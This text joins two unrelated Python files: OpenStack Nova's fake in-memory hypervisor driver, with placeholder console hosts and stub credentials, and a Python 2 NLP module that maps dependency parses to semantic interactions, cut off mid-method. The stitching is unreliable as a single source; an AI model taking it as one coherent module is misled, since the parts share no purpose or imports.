# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A fake (in-memory) hypervisor+api.
Allows nova testing w/o a hypervisor. This module also documents the
semantics of real hypervisor connections.
"""
import contextlib
from oslo_config import cfg
from oslo_serialization import jsonutils
from nova.compute import arch
from nova.compute import hv_type
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_mode
from nova.console import type as ctype
from nova import db
from nova import exception
from nova.i18n import _LW
from nova.openstack.common import log as logging
from nova import utils
from nova.virt import diagnostics
from nova.virt import driver
from nova.virt import hardware
from nova.virt import virtapi
CONF = cfg.CONF
CONF.import_opt('host', 'nova.netconf')
LOG = logging.getLogger(__name__)
_FAKE_NODES = None
def set_nodes(nodes):
"""Sets FakeDriver's node.list.
It has effect on the following methods:
get_available_nodes()
get_available_resource
To restore the change, call restore_nodes()
"""
global _FAKE_NODES
_FAKE_NODES = nodes
def restore_nodes():
"""Resets FakeDriver's node list modified by set_nodes().
Usually called from tearDown().
"""
global _FAKE_NODES
_FAKE_NODES = [CONF.host]
class FakeInstance(object):
def __init__(self, name, state, uuid):
self.name = name
self.state = state
self.uuid = uuid
def __getitem__(self, key):
return getattr(self, key)
class FakeDriver(driver.ComputeDriver):
capabilities = {
"has_imagecache": True,
"supports_recreate": True,
}
# Since we don't have a real hypervisor, pretend we have lots of
# disk and ram so this driver can be used to test large instances.
vcpus = 1000
memory_mb = 800000
local_gb = 600000
"""Fake hypervisor driver."""
def __init__(self, virtapi, read_only=False):
super(FakeDriver, self).__init__(virtapi)
self.instances = {}
self.host_status_base = {
'vcpus': self.vcpus,
'memory_mb': self.memory_mb,
'local_gb': self.local_gb,
'vcpus_used': 0,
'memory_mb_used': 0,
'local_gb_used': 100000000000,
'hypervisor_type': 'fake',
'hypervisor_version': utils.convert_version_to_int('1.0'),
'hypervisor_hostname': CONF.host,
'cpu_info': {},
'disk_available_least': 0,
'supported_instances': jsonutils.dumps([(arch.X86_64,
hv_type.FAKE,
vm_mode.HVM)]),
'numa_topology': None,
}
self._mounts = {}
self._interfaces = {}
if not _FAKE_NODES:
set_nodes([CONF.host])
def init_host(self, host):
return
def list_instances(self):
return self.instances.keys()
def list_instance_uuids(self):
return [self.instances[name].uuid for name in self.instances.keys()]
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
pass
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
pass
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None,
flavor=None):
name = instance['name']
state = power_state.RUNNING
fake_instance = FakeInstance(name, state, instance['uuid'])
self.instances[name] = fake_instance
def snapshot(self, context, instance, name, update_task_state):
if instance['name'] not in self.instances:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
update_task_state(task_state=task_states.IMAGE_UPLOADING)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None, bad_volumes_callback=None):
pass
@staticmethod
def get_host_ip_addr():
return '192.168.0.1'
def set_admin_password(self, instance, new_pass):
pass
def inject_file(self, instance, b64_path, b64_contents):
pass
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
pass
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
pass
def unrescue(self, instance, network_info):
pass
def poll_rebooting_instances(self, timeout, instances):
pass
def migrate_disk_and_power_off(self, context, instance, dest,
flavor, network_info,
block_device_info=None,
timeout=0, retry_interval=0):
pass
def finish_revert_migration(self, context, instance, network_info,
block_device_info=None, power_on=True):
pass
def post_live_migration_at_destination(self, context, instance,
network_info,
block_migration=False,
block_device_info=None):
pass
def power_off(self, instance, shutdown_timeout=0, shutdown_attempts=0):
pass
def power_on(self, context, instance, network_info, block_device_info):
pass
def soft_delete(self, instance):
pass
def restore(self, instance):
pass
def pause(self, instance):
pass
def unpause(self, instance):
pass
def suspend(self, instance):
pass
def resume(self, context, instance, network_info, block_device_info=None):
pass
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None):
key = instance['name']
if key in self.instances:
del self.instances[key]
else:
LOG.warning(_LW("Key '%(key)s' not in instances '%(inst)s'"),
{'key': key,
'inst': self.instances}, instance=instance)
def cleanup(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None, destroy_vifs=True):
pass
def attach_volume(self, context, connection_info, instance, mountpoint,
disk_bus=None, device_type=None, encryption=None):
"""Attach the disk to the instance at mountpoint using info."""
instance_name = instance['name']
if instance_name not in self._mounts:
self._mounts[instance_name] = {}
self._mounts[instance_name][mountpoint] = connection_info
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
"""Detach the disk attached to the instance."""
try:
del self._mounts[instance['name']][mountpoint]
except KeyError:
pass
def swap_volume(self, old_connection_info, new_connection_info,
instance, mountpoint, resize_to):
"""Replace the disk attached to the instance."""
instance_name = instance['name']
if instance_name not in self._mounts:
self._mounts[instance_name] = {}
self._mounts[instance_name][mountpoint] = new_connection_info
def attach_interface(self, instance, image_meta, vif):
if vif['id'] in self._interfaces:
raise exception.InterfaceAttachFailed(
instance_uuid=instance['uuid'])
self._interfaces[vif['id']] = vif
def detach_interface(self, instance, vif):
try:
del self._interfaces[vif['id']]
except KeyError:
raise exception.InterfaceDetachFailed(
instance_uuid=instance['uuid'])
def get_info(self, instance):
if instance['name'] not in self.instances:
raise exception.InstanceNotFound(instance_id=instance['name'])
i = self.instances[instance['name']]
return hardware.InstanceInfo(state=i.state,
max_mem_kb=0,
mem_kb=0,
num_cpu=2,
cpu_time_ns=0)
def get_diagnostics(self, instance_name):
return {'cpu0_time': 17300000000,
'memory': 524288,
'vda_errors': -1,
'vda_read': 262144,
'vda_read_req': 112,
'vda_write': 5778432,
'vda_write_req': 488,
'vnet1_rx': 2070139,
'vnet1_rx_drop': 0,
'vnet1_rx_errors': 0,
'vnet1_rx_packets': 26701,
'vnet1_tx': 140208,
'vnet1_tx_drop': 0,
'vnet1_tx_errors': 0,
'vnet1_tx_packets': 662,
}
def get_instance_diagnostics(self, instance_name):
diags = diagnostics.Diagnostics(state='running', driver='fake',
hypervisor_os='fake-os', uptime=46664, config_drive=True)
diags.add_cpu(time=17300000000)
diags.add_nic(mac_address='01:23:45:67:89:ab',
rx_packets=26701,
rx_octets=2070139,
tx_octets=140208,
tx_packets = 662)
diags.add_disk(id='fake-disk-id',
read_bytes=262144,
read_requests=112,
write_bytes=5778432,
write_requests=488)
diags.memory_details.maximum = 524288
return diags
def get_all_bw_counters(self, instances):
"""Return bandwidth usage counters for each interface on each
running VM.
"""
bw = []
return bw
def get_all_volume_usage(self, context, compute_host_bdms):
"""Return usage info for volumes attached to vms on
a given host.
"""
volusage = []
return volusage
def get_host_cpu_stats(self):
stats = {'kernel': 5664160000000L,
'idle': 1592705190000000L,
'user': 26728850000000L,
'iowait': 6121490000000L}
stats['frequency'] = 800
return stats
def block_stats(self, instance_name, disk_id):
return [0L, 0L, 0L, 0L, None]
def get_console_output(self, context, instance):
return 'FAKE CONSOLE OUTPUT\nANOTHER\nLAST LINE'
def get_vnc_console(self, context, instance):
return ctype.ConsoleVNC(internal_access_path='FAKE',
host='fakevncconsole.com',
port=6969)
def get_spice_console(self, context, instance):
return ctype.ConsoleSpice(internal_access_path='FAKE',
host='fakespiceconsole.com',
port=6969,
tlsPort=6970)
def get_rdp_console(self, context, instance):
return ctype.ConsoleRDP(internal_access_path='FAKE',
host='fakerdpconsole.com',
port=6969)
def get_serial_console(self, context, instance):
return ctype.ConsoleSerial(internal_access_path='FAKE',
host='fakerdpconsole.com',
port=6969)
def get_console_pool_info(self, console_type):
return {'address': '127.0.0.1',
'username': 'fakeuser',
'password': 'fakepassword'}
def refresh_security_group_rules(self, security_group_id):
return True
def refresh_security_group_members(self, security_group_id):
return True
def refresh_instance_security_rules(self, instance):
return True
def refresh_provider_fw_rules(self):
pass
def get_available_resource(self, nodename):
"""Updates compute manager resource info on ComputeNode table.
Since we don't have a real hypervisor, pretend we have lots of
disk and ram.
"""
if nodename not in _FAKE_NODES:
return {}
host_status = self.host_status_base.copy()
host_status['hypervisor_hostname'] = nodename
host_status['host_hostname'] = nodename
host_status['host_name_label'] = nodename
host_status['cpu_info'] = '?'
return host_status
def ensure_filtering_rules_for_instance(self, instance_ref, network_info):
return
def get_instance_disk_info(self, instance, block_device_info=None):
return
def live_migration(self, context, instance_ref, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
post_method(context, instance_ref, dest, block_migration,
migrate_data)
return
def check_can_live_migrate_destination_cleanup(self, ctxt,
dest_check_data):
return
def check_can_live_migrate_destination(self, ctxt, instance_ref,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
return {}
def check_can_live_migrate_source(self, ctxt, instance_ref,
dest_check_data, block_device_info=None):
return
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
return
def confirm_migration(self, migration, instance, network_info):
return
def pre_live_migration(self, context, instance_ref, block_device_info,
network_info, disk, migrate_data=None):
return
def unfilter_instance(self, instance_ref, network_info):
return
def test_remove_vm(self, instance_name):
"""Removes the named VM, as if it crashed. For testing."""
self.instances.pop(instance_name)
def host_power_action(self, action):
"""Reboots, shuts down or powers up the host."""
return action
def host_maintenance_mode(self, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
if not mode:
return 'off_maintenance'
return 'on_maintenance'
def set_host_enabled(self, enabled):
"""Sets the specified host's ability to accept new instances."""
if enabled:
return 'enabled'
return 'disabled'
def get_volume_connector(self, instance):
return {'ip': CONF.my_block_storage_ip,
'initiator': 'fake',
'host': 'fakehost'}
def get_available_nodes(self, refresh=False):
return _FAKE_NODES
def instance_on_disk(self, instance):
return False
def quiesce(self, context, instance, image_meta):
pass
def unquiesce(self, context, instance, image_meta):
pass
class FakeVirtAPI(virtapi.VirtAPI):
def provider_fw_rule_get_all(self, context):
return db.provider_fw_rule_get_all(context)
@contextlib.contextmanager
def wait_for_instance_event(self, instance, event_names, deadline=300,
error_callback=None):
# NOTE(danms): Don't actually wait for any events, just
# fall through
yield
class SmallFakeDriver(FakeDriver):
# The api samples expect specific cpu memory and disk sizes. In order to
# allow the FakeVirt driver to be used outside of the unit tests, provide
# a separate class that has the values expected by the api samples. So
# instead of requiring new samples every time those
# values are adjusted allow them to be overwritten here.
vcpus = 1
memory_mb = 8192
local_gb = 1028
| |
"""
Main class for representing a sentence
"""
__version__ = "$Revision: 1.40 $"
#import Graph.networkx_v10rc1 as NX10 # import networkx as NX
from SimpleGraph import Graph
import sys, os
sys.path.append(os.path.dirname(os.path.abspath(__file__))+"/..")
import Utils.Range as Range
import types
import copy
#multiedges = True
def loadCorpus(corpus, parse, tokenization=None, removeNameInfo=False, removeIntersentenceInteractionsFromCorpusElements=True):
"""
Load an entire corpus through CorpusElements and add SentenceGraph-objects
to its SentenceElements-objects.
"""
import Utils.ElementTreeUtils as ETUtils
import sys
from Utils.ProgressCounter import ProgressCounter
from Utils.InteractionXML.CorpusElements import CorpusElements
# Corpus may be in file or not
if type(corpus) == types.StringType:
print >> sys.stderr, "Loading corpus file", corpus
corpusTree = ETUtils.ETFromObj(corpus)
corpusRoot = corpusTree.getroot()
# Use CorpusElements-class to access xml-tree
corpusElements = CorpusElements(corpusRoot, parse, tokenization, tree=corpusTree, removeNameInfo=removeNameInfo, removeIntersentenceInteractions=removeIntersentenceInteractionsFromCorpusElements)
print >> sys.stderr, str(len(corpusElements.documentsById)) + " documents, " + str(len(corpusElements.sentencesById)) + " sentences"
# Make sentence graphs
duplicateInteractionEdgesRemoved = 0
sentences = []
counter = ProgressCounter(len(corpusElements.sentences), "Make sentence graphs")
counter.showMilliseconds = True
for sentence in corpusElements.sentences[:]:
counter.update(1, "Making sentence graphs ("+sentence.sentence.get("id")+"): ")
# No tokens, no sentence. No also no dependencies = no sentence.
# Let's not remove them though, so that we don't lose sentences from input.
if len(sentence.tokens) == 0 or len(sentence.dependencies) == 0:
#corpusElements.sentences.remove(sentence)
sentence.sentenceGraph = None
continue
for pair in sentence.pairs:
# gif-xml defines two closely related element types, interactions and
# pairs. Pairs are like interactions, but they can also be negative (if
# interaction-attribute == False). Sometimes pair-elements have been
# (incorrectly) used without this attribute. To work around these issues
# we take all pair-elements that define interaction and add them to
# the interaction-element list.
isInteraction = pair.get("interaction")
if isInteraction == "True" or isInteraction == None:
sentence.interactions.append(pair) # add to interaction-elements
if pair.get("type") == None: # type-attribute must be explicitly defined
pair.set("type", "undefined")
# Construct the basic SentenceGraph (only syntactic information)
graph = SentenceGraph(sentence.sentence, sentence.tokens, sentence.dependencies)
# Add semantic information, i.e. the interactions
graph.mapInteractions(sentence.entities, sentence.interactions)
graph.interSentenceInteractions = sentence.interSentenceInteractions
duplicateInteractionEdgesRemoved += graph.duplicateInteractionEdgesRemoved
sentence.sentenceGraph = graph
graph.parseElement = sentence.parseElement
#graph.mapEntityHints()
print >> sys.stderr, "Skipped", duplicateInteractionEdgesRemoved, "duplicate interaction edges in SentenceGraphs"
return corpusElements
def getCorpusIterator(input, output, parse, tokenization=None, removeNameInfo=False, removeIntersentenceInteractions=True):
import Utils.ElementTreeUtils as ETUtils
from Utils.InteractionXML.SentenceElements import SentenceElements
#import xml.etree.cElementTree as ElementTree
if output != None:
etWriter = ETUtils.ETWriter(output)
for eTuple in ETUtils.ETIteratorFromObj(input, ("start", "end")):
element = eTuple[1]
if eTuple[0] in ["end", "memory"] and element.tag == "document":
sentences = []
for sentenceElement in element.findall("sentence"):
#print ElementTree.tostring(sentenceElement)
sentence = SentenceElements(sentenceElement, parse, tokenization, removeIntersentenceInteractions=removeIntersentenceInteractions)
if len(sentence.tokens) == 0 or len(sentence.dependencies) == 0:
sentence.sentenceGraph = None
else:
# Construct the basic SentenceGraph (only syntactic information)
graph = SentenceGraph(sentence.sentence, sentence.tokens, sentence.dependencies)
# Add semantic information, i.e. the interactions
graph.mapInteractions(sentence.entities, sentence.interactions)
graph.interSentenceInteractions = sentence.interSentenceInteractions
#duplicateInteractionEdgesRemoved += graph.duplicateInteractionEdgesRemoved
sentence.sentenceGraph = graph
graph.parseElement = sentence.parseElement
sentences.append(sentence)
yield sentences
if output != None:
etWriter.write(element)
elif element.tag == "corpus" and output != None:
if eTuple[0] == "start":
etWriter.begin(element)
else:
etWriter.end(element)
if eTuple[0] == "end" and element.tag in ["document", "corpus"]:
element.clear()
if output != None:
etWriter.close()
class SentenceGraph:
"""
The main purpose of SentenceGraph is to connect the syntactic dependency
parse (a graph where dependencies are edges and tokens are nodes) to the
semantic interactions (which form a graph where interactions are edges
and entities are nodes). Additionally, SentenceGraph provides several
dictionaries that e.g. map element ids to their corresponding elements.
"""
def __init__(self, sentenceElement, tokenElements, dependencyElements):
"""
Creates the syntactic graph part of the SentenceGraph. The semantic graph
can be added with mapInteractions.
@param sentenceElement: interaction-XML sentence-element
@type sentenceElement: cElementTree.Element
@param tokenElements: interaction-XML syntactic token elements
@type tokenElements: list of cElementTree.Element objects
@param dependencyElements: interacton-XML syntactic dependency elements
@type dependencyElements: list of cElementTree.Element objects
"""
self.sentenceElement = sentenceElement
self.tokens = tokenElements
self.dependencies = dependencyElements
#self.dependencyGraph = NX.XDiGraph(multiedges = multiedges)
#if multiedges:
# self.dependencyGraph = NX10.MultiDiGraph()
#else:
# self.dependencyGraph = NX10.DiGraph()
self.dependencyGraph = Graph()
self.interactions = None
self.entities = None
self.interactionGraph = None
self.entityGraph = None
self.duplicateInteractionEdgesRemoved = 0
self.tokenHeadScores = None
# Merged graph
self.mergedEntities = None
self.mergedEntityToDuplicates = None
self.mergedEntityGraph = None
self.tokensById = {}
for token in self.tokens:
self.tokensById[token.get("id")] = token
#self.dependencyGraph.add_node(token)
self.dependencyGraph.addNodes(self.tokens)
# Build the dependency graph using token-elements as nodes and dependency-elements
# as edge data
for dependency in self.dependencies:
#self.dependencyGraph.add_edge(self.tokensById[dependency.attrib["t1"]],\
self.dependencyGraph.addEdge(self.tokensById[dependency.get("t1")],\
self.tokensById[dependency.get("t2")],\
dependency)
# element=dependency)
# def getUndirectedDependencyGraph(self):
# """
# Create an undirected version of the syntactic dependency graph.
# """
# u = NX10.MultiGraph()
# for token in self.tokens:
# u.add_node(token)
# for dependency in self.dependencies:
# u.add_edge(self.tokensById[dependency.attrib["t1"]],\
# self.tokensById[dependency.attrib["t2"]], element=dependency)
# u.add_edge(self.tokensById[dependency.attrib["t2"]],\
# self.tokensById[dependency.attrib["t1"]], element=dependency)
# return u
def getSentenceId(self):
return self.sentenceElement.get("id")
def makeEntityGraph(self, entities, interactions, entityToDuplicates=None):
graph = Graph()
graph.addNodes(entities)
# make a dummy duplicate map if it's not required
if entityToDuplicates == None:
entityToDuplicates = {}
for e in entities:
entityToDuplicates[e] = []
# initialize a helper map
interactionMap = {}
for interaction in interactions:
e1 = self.entitiesById[interaction.get("e1")]
e2Id = interaction.get("e2")
if e2Id not in self.entitiesById: # intersentence interaction
if e2Id not in entities:
entities.append(e2Id)
entityToDuplicates[e2Id] = []
e2 = e2Id # make a dummy node
else:
e2 = self.entitiesById[e2Id]
if e1 not in interactionMap:
interactionMap[e1] = {}
if e2 not in interactionMap[e1]:
interactionMap[e1][e2] = []
interactionMap[e1][e2].append(interaction)
# make the graph
for e1 in entities: # loop through all given entities
for e2 in entities: # loop through all given entities
interactionTypes = set()
for d1 in [e1] + entityToDuplicates[e1]: # add duplicates to each iteration
for d2 in [e2] + entityToDuplicates[e2]: # add duplicates to each iteration
if d1 in interactionMap and d2 in interactionMap[d1]:
for interaction in interactionMap[d1][d2]:
if interaction.get("type") not in interactionTypes: # remove edges with the same type that another edge already had
graph.addEdge(e1, e2, interaction) # add primary and duplicate edges for the main entity pair
interactionTypes.add(interaction.get("type"))
return graph
# TODO: This method shouldn't be needed anymore
def getInteractions(self, entity1, entity2, merged=False):
"""
Return a list of interaction-elements which represent directed
interactions from entity1 to entity2.
@param entity1: a semantic node (trigger or named entity)
@type entity1: cElementTree.Element
@param entity2: a semantic node (trigger or named entity)
@type entity2: cElementTree.Element
"""
if merged:
# Note: mergeInteractionGraph must be called before
if self.mergedEntityToDuplicates == None:
self.mergeInteractionGraph(True)
if self.mergedEntityGraph == None:
self.mergedEntityGraph = self.makeEntityGraph(self.mergedEntities, self.interactions, self.mergedEntityToDuplicates)
return self.mergedEntityGraph.getEdges(entity1, entity2)
else:
if self.entityGraph == None:
self.entityGraph = self.makeEntityGraph(self.entities, self.interactions)
return self.entityGraph.getEdges(entity1, entity2)
def getOutInteractions(self, entity, merged=False):
if merged:
# Note: mergeInteractionGraph must be called before
#assert self.mergedEntityToDuplicates != None
if self.mergedEntityToDuplicates == None:
self.mergeInteractionGraph(True)
if self.mergedEntityGraph == None:
self.mergedEntityGraph = self.makeEntityGraph(self.mergedEntities, self.interactions, self.mergedEntityToDuplicates)
return self.mergedEntityGraph.getOutEdges(entity)
else:
if self.entityGraph == None:
self.entityGraph = self.makeEntityGraph(self.entities, self.interactions)
return self.entityGraph.getOutEdges(entity)
# rv = []
# for interaction in self.interactions:
# if interaction.get("e1") == entity1.get("id") and interaction.get("e2") == entity2.get("id"):
# rv.append(interaction)
# return rv
def mapInteractions(self, entityElements, interactionElements, verbose=False):
"""
Maps the semantic interactions to the syntactic graph.
Syntactic dependencies are defined between tokens. Semantic edges (interactions)
are defined between annotated entities. To utilize the correlation of the dependency
parse with the semantic interactions, the graphs must be aligned by mapping the
interaction graph's nodes (entities) to the syntactic graph's nodes (tokens). This
is done by determining the head tokens of the entities.
@param entityElements: the semantic nodes (triggers and named entities)
@type entityElements: list of cElementTree.Element objects
@param interactionElements: the semantic edges (e.g. Cause and Theme for GENIA)
@type interactionElements: list of cElementTree.Element objects
@param verbose: Print selected head tokens on screen
@param verbose: boolean
"""
self.interactions = interactionElements
self.entities = entityElements
# Entities that have no text binding can not be mapped and are therefore removed
for entity in self.entities[:]:
if entity.get("charOffset") == "":
self.entities.remove(entity)
#self.interactionGraph = NX.XDiGraph(multiedges = multiedges)
#if multiedges:
# self.interactionGraph = NX10.MultiDiGraph()
#else:
# self.interactionGraph = NX10.DiGraph()
self.interactionGraph = Graph()
self.interactionGraph.addNodes(self.tokens)
#for token in self.tokens:
# self.interactionGraph.add_node(token)
self.entitiesByToken = {} # a mapping for fast access
self.entitiesById = {}
self.entityHeadTokenByEntity = {}
sentenceSpan = (0, len(self.sentenceElement.get("text"))) # for validating the entity offsets
for entity in self.entities[:]:
headToken = self.mapEntity(entity, verbose)
if headToken != None:
self.entityHeadTokenByEntity[entity] = headToken
self.entitiesById[entity.get("id")] = entity
else:
# Check that the entity is within the sentence
if not Range.overlap(Range.charOffsetToSingleTuple(entity.get("charOffset")), sentenceSpan):
raise Exception("Entity " + entity.get("id") + ", charOffset " + entity.get("charOffset") + ", does not overlap with sentence " + self.sentenceElement.get("id") + ", length " + str(sentenceSpan[1]) )
# Assume there simply is no token corresponding to the entity
self.entities.remove(entity)
self._markNamedEntities()
for interaction in self.interactions:
if not self.entitiesById.has_key(interaction.get("e1")):
continue # e1 is outside of this sentence
if not self.entitiesById.has_key(interaction.get("e2")):
continue # e2 is outside of this sentence
token1 = self.entityHeadTokenByEntity[self.entitiesById[interaction.get("e1")]]
token2 = self.entityHeadTokenByEntity[self.entitiesById[interaction.get("e2")]]
# found = False
# if multiedges:
# edges = self.interactionGraph.get_edge_data(token1, token2, default={})
# for i in range(len(edges)):
# edge = edges[i]["element"]
# if edge.attrib["type"] == interaction.attrib["type"]:
# found = True
# break
# if not found:
# self.interactionGraph.add_edge(token1, token2, element=interaction)
# else:
# self.duplicateInteractionEdgesRemoved += 1
found = False
edges = self.interactionGraph.getEdges(token1, token2)
for edge in edges:
if edge[2].get("type") == interaction.get("type"):
found = True
break
if not found:
self.interactionGraph.addEdge(token1, token2, interaction)
else:
# TODO: "skipped" would be better than "removed"
self.duplicateInteractionEdgesRemoved += 1
def mapEntity(self, entityElement, verbose=False):
"""
Determine the head token for a named entity or trigger. The head token is the token closest
to the root for the subtree of the dependency parse spanned by the text of the element.
@param entityElement: a semantic node (trigger or named entity)
@type entityElement: cElementTree.Element
@param verbose: Print selected head tokens on screen
@param verbose: boolean
"""
headOffset = None
if entityElement.get("headOffset") != None:
headOffset = Range.charOffsetToSingleTuple(entityElement.get("headOffset"))
if entityElement.get("charOffset") != "":
charOffsets = Range.charOffsetToTuples(entityElement.get("charOffset"))
else:
charOffsets = []
# Each entity can consist of multiple syntactic tokens, covered by its
# charOffset-range. One of these must be chosen as the head token.
headTokens = [] # potential head tokens
for token in self.tokens:
#print token.attrib["id"], token.attrib["charOffset"]
tokenOffset = Range.charOffsetToSingleTuple(token.get("charOffset"))
if headOffset != None and entityElement.get("type") != "Binding":
# A head token can already be defined in the headOffset-attribute.
# However, depending on the tokenization, even this range may
# contain multiple tokens. Still, it can always be assumed that
# if headOffset is defined, the corret head token is in this range.
if Range.overlap(headOffset,tokenOffset):
headTokens.append(token)
else:
for offset in charOffsets:
if Range.overlap(offset,tokenOffset):
headTokens.append(token)
if len(headTokens)==1: # An unambiguous head token was found
token = headTokens[0]
else: # One head token must be chosen from the candidates
selHead = None
if entityElement.get("type") == "Binding":
for t in headTokens:
compText = t.get("text").lower()
if compText.find("bind") != -1 or compText.find("complex") != -1:
selHead = t
#print "Head:", selHead.get("text"), "/", entityElement.get("text"), entityElement.get("headOffset"), selHead.get("charOffset")
entityElement.set("headOffset", selHead.get("charOffset"))
break
if selHead == None:
token = self.findHeadToken(headTokens)
else:
token = selHead
if verbose:
print >> sys.stderr, "Selected head:", token.get("id"), token.get("text")
#assert token != None, entityElement.get("id")
if token != None:
# The ElementTree entity-element is modified by setting the headOffset attribute
if entityElement.get("headOffset") == None or entityElement.get("headOffset") != token.get("charOffset"):
entityElement.set("headOffset", token.get("charOffset"))
if not self.entitiesByToken.has_key(token):
self.entitiesByToken[token] = []
self.entitiesByToken[token].append(entityElement)
else:
print >> sys.stderr, "Warning, no tokens for entity", entityElement.get("id")
return token
# def mapEntityHints(self, verbose=False):
# """
# Determine the head token for a named entity or trigger. The head token is the token closest
# to the root for the subtree of the dependency parse spanned by the text of the element.
#
# @param entityElement: a semantic node (trigger or named entity)
# @type entityElement: cElementTree.Element
# @param verbose: Print selected head tokens on screen
# @param verbose: boolean
# """
# self.entityHints = self.sentenceElement.findall("entityHint")
# self.entityHintsByToken = {}
# for entityElement in self.entityHints:
# headOffset = None
# if entityElement.attrib.has_key("headOffset"):
# headOffset = Range.charOffsetToSingleTuple(entityElement.attrib["headOffset"])
# if entityElement.attrib["charOffset"] != "":
# charOffsets = Range.charOffsetToTuples(entityElement.attrib["charOffset"])
# else:
# charOffsets = []
# # Each entity can consist of multiple syntactic tokens, covered by its
# # charOffset-range. One of these must be chosen as the head token.
# headTokens = [] # potential head tokens
# for token in self.tokens:
# #print token.attrib["id"], token.attrib["charOffset"]
# tokenOffset = Range.charOffsetToSingleTuple(token.attrib["charOffset"])
# if headOffset != None:
# # A head token can already be defined in the headOffset-attribute.
# # However, depending on the tokenization, even this range may
# # contain multiple tokens. Still, it can always be assumed that
# # if headOffset is defined, the corret head token is in this range.
# if Range.overlap(headOffset,tokenOffset):
# headTokens.append(token)
# else:
# for offset in charOffsets:
# if Range.overlap(offset,tokenOffset):
# headTokens.append(token)
# if len(headTokens)==1: # An unambiguous head token was found
# token = headTokens[0]
# else: # One head token must be chosen from the candidates
# token = self.findHeadToken(headTokens)
# if verbose:
# print >> sys.stderr, "Selected head:", token.attrib["id"], token.attrib["text"]
# assert token != None, entityElement.get("id")
# if token != None:
# # The ElementTree entity-element is modified by setting the headOffset attribute
# if not entityElement.attrib.has_key("headOffset"):
# entityElement.attrib["headOffset"] = token.attrib["charOffset"]
# if not self.entityHintsByToken.has_key(token):
# self.entityHintsByToken[token] = []
# self.entityHintsByToken[token].append(entityElement)
def findHeadToken(self, candidateTokens):
"""
Select the candidate token that is closest to the root of the subtree of the depencdeny parse
to which the candidate tokens belong to. See getTokenHeadScores method for the algorithm.
@param candidateTokens: the list of syntactic tokens from which the head token is selected
@type candidateTokens: list of cElementTree.Element objects
"""
tokenHeadScores = self.getTokenHeadScores()
#if debug:
# print "Tokens:", candidateTokenIds
# print "Scores:", tokenScores
if len(candidateTokens) == 0:
return None
highestScore = -9999999
bestTokens = []
for token in candidateTokens:
if tokenHeadScores[token] > highestScore:
highestScore = tokenHeadScores[token]
for token in candidateTokens:
if tokenHeadScores[token] == highestScore:
bestTokens.append(token)
# if debug:
# print "tokens:"
# for i in range(len(candidateTokenIds)):
# print "[", candidateTokenIds[i], self.tokensById[candidateTokenIds[i]].text, tokenHeadScores[candidateTokenIds[i]], "]"
return bestTokens[-1]
def getTokenHeadScores(self):
"""
A head token is chosen using a heuristic that prefers tokens closer to the
root of the dependency parse. In a list of candidate tokens, the one with
the highest score is the head token. The return value of this method
is a dictionary that maps token elements to their scores.
"""
# Token head scores are cached the first time this function is called
if self.tokenHeadScores != None:
return self.tokenHeadScores
else:
self.tokenHeadScores = {}
# Give all tokens initial scores
tokenById = {}
for token in self.tokens:
tokenId = token.get("id")
assert tokenId not in tokenById
tokenById[tokenId] = token
self.tokenHeadScores[token] = 0 # initialize score as zero (unconnected token)
for dependency in self.dependencies:
if dependency.get("t1") == token.get("id") or dependency.get("t2") == token.get("id"):
self.tokenHeadScores[token] = 1 # token is connected by a dependency
break
# Give a low score for tokens that clearly can't be head and are probably produced by hyphen-splitter
for token in self.tokens:
tokenText = token.get("text")
if tokenText == "\\" or tokenText == "/" or tokenText == "-":
self.tokenHeadScores[token] = -1
# Loop over all dependencies and increase the scores of all governor tokens
# until each governor token has a higher score than its dependent token.
# Some dependencies might form a loop so a list is used to define those
# dependency types used in determining head scores.
depTypesToInclude = ["prep", "nn", "det", "hyphen", "num", "amod", "nmod", "appos", "measure", "dep", "partmod"]
#depTypesToRemoveReverse = ["A/AN"]
modifiedScores = True
loopCount = 0 # loopcount for devel set approx. 2-4
while modifiedScores == True: # loop until the scores no longer change
if loopCount > 20: # survive loops
print >> sys.stderr, "Warning, possible loop in parse for sentence", self.getSentenceId()
break
modifiedScores = False
# for token1 in self.tokens:
# for token2 in self.tokens: # for each combination of tokens...
for dep in self.dependencies: # ... check each dependency
token1 = tokenById[dep.get("t1")]
token2 = tokenById[dep.get("t2")]
if dep.get("type") in depTypesToInclude:
# The governor token of the dependency must have a higher score
# than the dependent token.
if self.tokenHeadScores[token1] <= self.tokenHeadScores[token2]:
self.tokenHeadScores[token1] = self.tokenHeadScores[token2] + 1
modifiedScores = True
# elif dep.attrib["t1"] == tokenI.attrib["id"] and dep.attrib["t2"] == tokenJ.attrib["id"] and (dep.attrib["type"] in depTypesToRemoveReverse):
# #tokenScores[i] -= 1
# if self.tokenHeadScores[tokenJ] <= self.tokenHeadScores[tokenI]:
# self.tokenHeadScores[tokenJ] = self.tokenHeadScores[tokenI] + 1
# modifiedScores = True
loopCount += 1
# Add scores to tokens
for token in self.tokens:
token.set("headScore", str(self.tokenHeadScores[token]))
return self.tokenHeadScores
def _markNamedEntities(self):
"""
This method is used to define which tokens belong to _named_ entities.
Named entities are sometimes masked when testing learning of interactions, to
prevent the system making a trivial decision based on commonly interacting names.
This function assumes that all given entities are named entities.
"""
self.tokenIsName = {}
self.tokenIsEntity = {}
self.tokenIsEntityHead = {}
# Initialize the dictionaries
for token in self.tokens:
self.tokenIsName[token] = False
self.tokenIsEntity[token] = False
self.tokenIsEntityHead[token] = []
